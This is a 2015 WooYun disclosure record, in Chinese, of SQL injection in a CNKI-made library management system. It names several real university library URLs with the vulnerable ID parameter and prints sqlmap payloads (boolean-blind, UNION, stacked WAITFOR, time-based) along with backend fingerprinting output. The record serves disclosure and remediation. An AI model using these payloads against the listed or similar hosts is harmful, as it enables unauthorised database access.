当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-091585

漏洞标题:某图书馆管理系统存在SQL注入

相关厂商:同方知网(北京)技术有限公司

漏洞作者: 路人甲

提交时间:2015-01-15 16:58

修复时间:2015-04-15 17:00

公开时间:2015-04-15 17:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-15: 细节已通知厂商并且等待厂商处理中
2015-01-20: 厂商已经确认,细节仅向厂商公开
2015-01-23: 细节向第三方安全合作伙伴开放
2015-03-16: 细节向核心白帽子及相关领域专家公开
2015-03-26: 细节向普通白帽子公开
2015-04-05: 细节向实习白帽子公开
2015-04-15: 细节向公众公开

简要描述:

RT

详细说明:

有大牛交过了
更多案例见: WooYun: 某图书馆管理系统存在SQL注入

漏洞证明:

http://211.64.123.12/bj_client/App_Pages/App_page/News_Detail.aspx?ID=7
http://59.73.148.27:8080/bj_client/App_Pages/App_page/News_Detail.aspx?ID=7
http://lib.xjmu.edu.cn/oa_client/App_Pages/App_page/News_Detail.aspx?ID=10
http://vrs.lib.xju.edu.cn/oa_client/App_Pages/App_page/News_Detail.aspx?ID=8
http://lib.heuet.edu.cn:8080/oa_client/App_Pages/App_page/News_Detail.aspx?ID=8


Place: GET
Parameter: ID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ID=7' AND 5261=5261 AND 'HVEC'='HVEC
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: ID=7' UNION ALL SELECT NULL, NULL, NULL, CHAR(58)+CHAR(115)+CHAR(12
0)+CHAR(99)+CHAR(58)+CHAR(76)+CHAR(105)+CHAR(85)+CHAR(78)+CHAR(79)+CHAR(109)+CHA
R(102)+CHAR(101)+CHAR(116)+CHAR(117)+CHAR(58)+CHAR(111)+CHAR(108)+CHAR(110)+CHAR
(58), NULL, NULL, NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: ID=7'; WAITFOR DELAY '0:0:5';--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: ID=7' WAITFOR DELAY '0:0:5'--
---
[11:52:40] [INFO] testing MySQL
[11:52:41] [WARNING] the back-end DBMS is not MySQL
[11:52:41] [INFO] testing Oracle
[11:52:41] [WARNING] the back-end DBMS is not Oracle
[11:52:41] [INFO] testing PostgreSQL
[11:52:41] [WARNING] the back-end DBMS is not PostgreSQL
[11:52:41] [INFO] testing Microsoft SQL Server
[11:52:42] [INFO] confirming Microsoft SQL Server
[11:52:46] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
[11:52:46] [INFO] fetched data logged to text files under 'C:\DOCUME~1\ADMINI~1\
LOCALS~1\Temp\HZ$D86~1.085\HZ$D86~1.088\SQLMAP~1\Bin\output\59.73.148.27'

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2015-01-20 14:35

厂商回复:

CNVD确认所述情况,已经由CNVD通过以往建立的处置渠道向赛尔教育通报。

最新状态:

暂无